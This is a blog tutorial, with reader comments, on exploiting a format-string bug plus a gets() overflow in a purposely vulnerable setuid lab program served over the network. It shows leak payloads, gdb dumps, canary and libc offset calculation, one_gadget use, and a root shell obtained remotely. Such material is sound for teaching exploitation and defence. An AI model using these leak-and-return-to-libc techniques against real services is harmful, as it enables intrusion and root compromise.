Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit
Hey. Welcome back. Last time we learned how to bypass 'nx' bit by making stack executable again with functions like mprotect() and executed our shellcode. This time we will learn about new type of vulnerability than our usual stack overflows. Format string vulnerabilities seem very innocent at first but can provide lot of critical information at attacker's disposal. We will develop a remote exploit and defeat stack canary, nx bit and ASLR.
Let's dive into a simple example. A simple program. It first asks for user's name and then a secret code. It can then verify or do something else with it but for now we will only focus on above part only. You can clearly see a buffer overflow vulnerability gets function for secret code. There could be a read function with improper bound checks too. No buffering for stdin and stdout is set with setvbuf function as we will serve this program over a network. Did you notice 'printf(name);' on line 21 of code ? Seems a lazy programmer's mistake. It directly prints the buffer pointed by name without format strings. It seems so innocent but what will be the behavior if we provide some format strings to name instead ? Let's check out. First compile the code. We are using a 64 bit system and this time we will keep all default protection mechanisms and ASLR on, so no extra flags required. And on target server setuid root permissions to it.
virtual@mecha:~$ gcc format.c -o format
virtual@mecha:~$ sudo chown root format
virtual@mecha:~$ sudo chmod +s format
Now we will serve it on a port with this command. virtual@mecha:~$ socat tcp-listen:5555,reuseaddr,fork, exec:"./format"
It listens on tcp port 5555 and whenever a connection is made, it executes "./format". You can check by connecting to server with netcat or telnet on port 5555. virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: Attacker
Hello Attacker
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
Great it's working over network. Let's pass some format strings to name. I have passed '%lx-' 15 times. virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffeae3ff980-9a7b045172d7ef00
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
What are those weird hexadecimal characters ? Also '2d786c25' has repeated 15 times. If you look up ASCII table, it is hex for '%lx-'. It means format string has printed out the contents of stack to us. There are some addresses leaked too. You can verify it by loading the program in gdb and dumping stack. Here '%lx' is used for long hexadecimal as this is 64 bit and '-' is used to separate the output. In this article we will focus on using those leaked addresses to find libc base address and try to leak stack canary. We will then use this leaked memory to do a successful return to libc by overflowing the buffer while entering secret code. Let's load program in gdb and analyze. virtual@mecha:~$ gdb format -q
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : ENABLED
RELRO : Partial
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ disas center
Dump of assembler code for function center:
0x0000000000000815 <+0>: push rbp
0x0000000000000816 <+1>: mov rbp,rsp
0x0000000000000819 <+4>: sub rsp,0x90
0x0000000000000820 <+11>: mov rax,QWORD PTR fs:0x28
0x0000000000000829 <+20>: mov QWORD PTR [rbp-0x8],rax
0x000000000000082d <+24>: xor eax,eax
0x000000000000082f <+26>: lea rdi,[rip+0x1b2] # 0x9e8
0x0000000000000836 <+33>: mov eax,0x0
0x000000000000083b <+38>: call 0x6e0 <printf@plt>
0x0000000000000840 <+43>: lea rax,[rbp-0x90]
0x0000000000000847 <+50>: mov rdi,rax
0x000000000000084a <+53>: mov eax,0x0
0x000000000000084f <+58>: call 0x710 <gets@plt>
0x0000000000000854 <+63>: lea rax,[rbp-0x90]
0x000000000000085b <+70>: mov rsi,rax
0x000000000000085e <+73>: lea rdi,[rip+0x1a3] # 0xa08
0x0000000000000865 <+80>: mov eax,0x0
0x000000000000086a <+85>: call 0x6e0 <printf@plt>
0x000000000000086f <+90>: nop
0x0000000000000870 <+91>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000000874 <+95>: xor rax,QWORD PTR fs:0x28
0x000000000000087d <+104>: je 0x884 <center+111>
0x000000000000087f <+106>: call 0x6d0 <__stack_chk_fail@plt>
0x0000000000000884 <+111>: leave
0x0000000000000885 <+112>: ret
End of assembler dump.
gdb-peda$ b *center +95
Breakpoint 1 at 0x874
As you can see most memory protections like stack canary, nx bit are on. We will keep ASLR disabled in gdb for now so that we can analyze easily. We have verified format string vulnerability in name. Let's check the buffer overflow and stack canary in code. Disassemble the center function. and set breakpoint at *center +95, as it verifies the stack canary here and then decides to call stack_check_fail function. Stack Canaries
Stack canaries are just random bytes placed after the buffer and checked before function returns. If a buffer overflow occurs then stack canary is overwritten, hence the stack check fails and exception is raised. Stack canaries usually end with null bytes to make exploitation difficult. We don't have to worry about null bytes in gets function. We will try to find stack canary by format string vulnerability here. You can try to bruteforce it on 32 bit systems too. It won't really be feasible to bruteforce on 64 bit. Run the program with format strings and let's fill the code buffer completely with 128 'A's.gdb-peda$ r
Starting program: /home/archer/compiler_tests/format
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-
Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-2d786c252d786c25-2d786c252d786c25-
2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a2d786c25-
7ffec094dd20-7068c9a76fdc1c00-
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x7068c9a76fdc1c00
RBX: 0x0
RCX: 0x0
RDX: 0x7fbb5533a720 --> 0x0
RSI: 0x7ffec094b4b0 ("Entered Command center with code > ", 'A' , " .\n94b550-7fbb5533a720-0-7fbb555204c0"...)
RDI: 0x0
RBP: 0x7ffec094dbe0 --> 0x7ffec094dc40 --> 0x555aec917960 (<__libc_csu_init>: push r15)
RSP: 0x7ffec094db50 ('A' )
RIP: 0x555aec917874 (<center+95>: xor rax,QWORD PTR fs:0x28)
R8 : 0x7fbb555204c0 (0x00007fbb555204c0)
R9 : 0x7ffec094af60 --> 0x0
R10: 0x0
R11: 0x246
R12: 0x555aec917730 (<_start>: xor ebp,ebp)
R13: 0x7ffec094dd20 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x555aec91786a <center+85>: call 0x555aec9176e0 <printf@plt>
0x555aec91786f <center+90>: nop
0x555aec917870 <center+91>: mov rax,QWORD PTR [rbp-0x8]
=> 0x555aec917874 <center+95>: xor rax,QWORD PTR fs:0x28
0x555aec91787d <center+104>: je 0x555aec917884 <center+111>
0x555aec91787f <center+106>: call 0x555aec9176d0 <__stack_chk_fail@plt>
0x555aec917884 <center+111>: leave
0x555aec917885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffec094db50 ('A' )
0008| 0x7ffec094db58 ('A' )
0016| 0x7ffec094db60 ('A' )
0024| 0x7ffec094db68 ('A' )
0032| 0x7ffec094db70 ('A' )
0040| 0x7ffec094db78 ('A' )
0048| 0x7ffec094db80 ('A' )
0056| 0x7ffec094db88 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000555aec917874 in center ()
Stack canary i.e. '0x7068c9a76fdc1c00' is stored in rax register then checked. And if you notice the memory dumped by our format string the last value is actually our stack canary. Yeah. We leaked stack canary. First problem solved. Now for bypassing NX bit, we will do return to libc. But as ASLR will be on. We need to find libc base address every time. To solve this we will use the addresses leaked by format string. You can leak such addresses to find approx position of your shellcode too. gdb-peda$ vmmap
Start End Perm Name
0x00007fbb54f82000 0x00007fbb55135000 r-xp /usr/lib/libc-2.27.so
If you look carefully at the dumped addresses, you can notice some are from libc. They must have been loaded on stack when required by some functions. They must be pointing to specific functions in libc, so whenever u run the program they will always be same. Even when ASLR is on, only the addresses will change but they will still point to same function. That means they have same offset from libc base every time. We can take one of these address, calculate it's offset from libc base and use that offset every time to find libc base. Time to set aslr on and find offset to libc base. gdb-peda$ aslr on
gdb-peda$ aslr
ASLR is ON
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffe72f66210-7fc16bb5a720-0-7fc16bd404c0-7fc16bd404c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffe72f689e0-87f4107dcd08200
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x87f4107dcd08200
RBX: 0x0
RCX: 0x0
RDX: 0x7fc16bb5a720 --> 0x0
RSI: 0x7ffe72f66170 ("Entered Command center with code > ", 'A' , " .\nf66210-7fc16bb5a720-0-7fc16bd404c0"...)
RDI: 0x0
RBP: 0x7ffe72f688a0 --> 0x7ffe72f68900 --> 0x5581705e8960 (<__libc_csu_init>: push r15)
RSP: 0x7ffe72f68810 ('A' )
RIP: 0x5581705e8874 (<center+95>: xor rax,QWORD PTR fs:0x28)
R8 : 0x7fc16bd404c0 (0x00007fc16bd404c0)
R9 : 0x7ffe72f65c20 --> 0x0
R10: 0x0
R11: 0x246
R12: 0x5581705e8730 (<_start>: xor ebp,ebp)
R13: 0x7ffe72f689e0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x5581705e886a <center+85>: call 0x5581705e86e0 <printf@plt>
0x5581705e886f <center+90>: nop
0x5581705e8870 <center+91>: mov rax,QWORD PTR [rbp-0x8]
=> 0x5581705e8874 <center+95>: xor rax,QWORD PTR fs:0x28
0x5581705e887d <center+104>: je 0x5581705e8884 <center+111>
0x5581705e887f <center+106>: call 0x5581705e86d0 <__stack_chk_fail@plt>
0x5581705e8884 <center+111>: leave
0x5581705e8885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffe72f68810 ('A' )
0008| 0x7ffe72f68818 ('A' )
0016| 0x7ffe72f68820 ('A' )
0024| 0x7ffe72f68828 ('A' )
0032| 0x7ffe72f68830 ('A' )
0040| 0x7ffe72f68838 ('A' )
0048| 0x7ffe72f68840 ('A' )
0056| 0x7ffe72f68848 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x00005581705e8874 in center ()
gdb-peda$ vmmap
Start End Perm Name
0x00007fc16b7a2000 0x00007fc16b955000 r-xp /usr/lib/libc-2.27.so
I am choosing the 4th address which seems to be from libc and calculate it's offset from libc base. 0x7fc16bd404c0-0x00007fc16b7a2000 = 0x59e4c0
Cool. This offset will always be same for the 4th address. Now you can find offset to stack canary and return address either by direct stack dump or a pattern. 0x7ffe72f68870: 0x4141414141414141 0x4141414141414141
0x7ffe72f68880: 0x4141414141414141 0x4141414141414141
0x7ffe72f68890: 0x0000000000000000 0x087f4107dcd08200 <== canary
0x7ffe72f688a0: 0x00007ffe72f68900 0x00005581705e893d <== return address
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565
[*] Exact match at offset 136
It turned out to be 136 for stack canary and 152 for return address on my system. So the layout is code = 'A'*136 + canary(8) + 'B'*8 + return_address(8)
Put your glasses on, it's time to make remote exploit.Since we are serving the program over a network, I will simply use telnetlib in python to connect and interact with it. You can use pwntools library too, but for simplicity I'm just using telnetlib. You can read more on pwntools here. We will see more on pwntools in future. So our strategy will be first to send format strings then read output and extract libc address and stack canary. Then calculate libc base from the address and generate a return to libc payload. We will call setuid(0); first, as we know modern systems drop privileges when not required in setuid binaries. Since this is 64 bit we will pop 0x0 to rdi register and it will be passed to setuid. Also for executing '/bin/sh', I'm simply using one_gadget execve. You can use this tool to find one_gadget or install it simply with
$ gem install one_gadget
. One thing we are assuming here is that we know the libc version of the target and crafting return to libc according to that. But when you don't know the libc version, you may try to leak some more memory and try to find some offsets according to dumped addresses. Also you may look up online libc databases to better find the target libc version. One thing you can notice is last 3 digits in libc address are always '000' so, the offset's last 3 digits will also be same. This will be even easier in 32 bit as addresses are smaller. We can also leak addresses from Global Offset Table. A cool place to search is libc.blukat.me and libcdb.com. Also I found a repository with big database of libc's here. We will learn more on using such leaks and more ways to leak in next articles. virtual@mecha:~$ one_gadget /usr/lib/libc.so.6
0x43b88 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x43bdc execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xe49c0 execve("/bin/sh", rsp+0x60, environ)
constraints:
[rsp+0x60] == NULL
You can find more ROP gadgets with ROPgadget or Ropper tool. And find offset to setuid. virtual@mecha:~$ readelf -a /usr/lib/libc.so.6 | grep setuid
23: 00000000000c67a0 145 FUNC WEAK DEFAULT 12 setuid@@GLIBC_2.2.5
1604: 0000000000000000 0 FILE LOCAL DEFAULT ABS setuid.c
5134: 00000000000c67a0 145 FUNC LOCAL DEFAULT 12 __setuid
5878: 00000000000c67a0 145 FUNC WEAK DEFAULT 12 setuid
Compiling everything together, here's my simple exploit code. I have commented each line with explaination. Here's how the stack layout will be after exploit.Run it.
virtual@mecha:~$ python2 format.py
Enter this command to setup a server. 5555 is port !
$ socat tcp-listen:5555,fork, exec:'./format'
[i] Enter target ip (localhost): 192.168.43.204
[i] Enter target port (5555): 5555
[i] Connecting to server
What is your name?
Name:
[' Hello 7ffdec247930', '7fb462c49720', '0', '7fb462e2f4c0', '7fb462e2f4c0', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c25', '7ffdec24a100', '3fe25b5b8083e400', 'Enter secret code !\nCode:']
[+] Found Stack Canary : 0x3fe25b5b8083e400
[+] Calculated Libc base : 0x7fb462891000
[i] Payload generated
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[+] Shell ready. Enter commands !
uid=0(root) gid=1000(virtual) groups=1000(virtual),10(wheel)
whoami
root
pwd
/home/virtual/
Awesome. We wrote a remote expolit and as the service was running as root, we got root privileges.Well, that's all for now. In next articles we will learn more about GOT and PLT, how powerful format strings exploits can be, and more exploitaitons techniques. Keep practicing.
For any queries contact : @ShivamShrirao
Next Read: Return to PLT, GOT to bypass ASLR remotely
Can you please help me out with the following situation?
ReplyDeleteWhen i executed format.py i could get the stack canary , calculated libc ,payload value and could reach till this line [+] Shell ready. Enter commands ! -in my output , but could not get the remote connection to the machine.
When I executed my format.py file and when it reaches this this line [+] Shell ready. Enter commands !--its displays that connection closed from the server.
Not sure what I missed. I did find one_gadget, pop_rdi and setUid values for my system.
Also that I could not understand why are we using metasploit and what is pattern_offset.rb doing in the below mentioned command?
"/opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565"
In the above command I am not sure how are you generating this value -"0x3765413665413565".
Your timely response would be highly appreciated.
Looking forward for your response.
Thanks,
Varsha
Regarding metasploit, I am using that to create a long pattern, So when the buffer overflow occurs registers/memory is overwritten, I can see what pattern it is overwritten by and calculate offset easily instead of trying with different lengths. You can read more about it here https://www.ret2rop.com/2018/08/stack-based-buffer-overflow-x64.html
DeleteRegarding exploit failing I think most likely your one_gadget isn't working. Sometimes it happens when registers don't have correct value. Try few other one_gadgets, or u can make execve('/bin/sh') or system('sh') chain. I have explained that in some of my other articles. Also to be sure do try attaching the target program to gdb and checking the exploit execution step by step.
when i use the exact same code i don´t get the Library addresses leaked. Did something change in terms of security on Ubuntu or am i doing somethin wrong?
ReplyDeleteMy Result:
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7fff52dd39d0-0-0-6-6-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c252d786c25-7fff52dd61b0-8e04e06c68602600-0
�a�R�Enter secret code !
Code: gfdfdfdf
Entered Command center with code > gfdfdfdf .
In your results I can see the addresses are leaked. These are some random left over addresses and memory on the stack. So they may or may not contain libc address at the exact place as they mostly don't have any particular order.
DeleteThere are some starting with "7fff" in your dump, they may be from libc, you have to check if they are in range by comparing with range of libc addresses from "vmmap" command.
If not you may have to try longer sequences to dump more memory and also try indexing the format strings as I have discussed in next articles till you find some useful addresses. Btw I recommend using "%p" instead of "%lx", so your payloads will be shorter.
What part of exploit exactly are you facing the problem ? Also while debugging it is better to first turn off the ASLR so that addresses don't change and then you can turn it on once you can do it with aslr off.
ReplyDeleteIf you disable ASLR, the addresses will remain the same so you don't have to calculate again and again. You can also debug while using the exploit script by `at`taching to the server process with gdb.
ReplyDeleteFirst run the server and connect to it. Don't send any data. Start gdb as root and find the pid of the server process. Then enter `at pid` in gdb, replace pid with pid of process. Then u can debug the running process. Setup breakpoints and enter `c`ontinue.
ReplyDeleteIf you are attaching to the process you can just send input through your python script, like the final exploit script I am using in the article.
ReplyDeleteYou can send input through your already established netcat connection.
ReplyDeleteType or pipe into that netcat connection.
ReplyDeleteOr
Connect with telnet/sockets in python like my exploit script and send input through that connection.
Run the script. Connect script to server. A buf process is spawned asking for input. Do not send input from script. Attach to that process in gdb. Set breakpoints, continue. Then continue the script and send the input.
ReplyDeleteBtw with some bash tricks pipes can also dynamically send input but I would suggest just stick to the script.
If you know python you know you can edit the script to do whatever you want it to do ?
ReplyDeleteExcellent article! Question - Does having ASLR on affect leaked information via format string? When ASLR is on, I get less output from e.g. %p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p... than I do when ASLR is off. When ASLR Is on, it shows `(nil)` for many addresses. Is there some other anti-format string protection?
ReplyDelete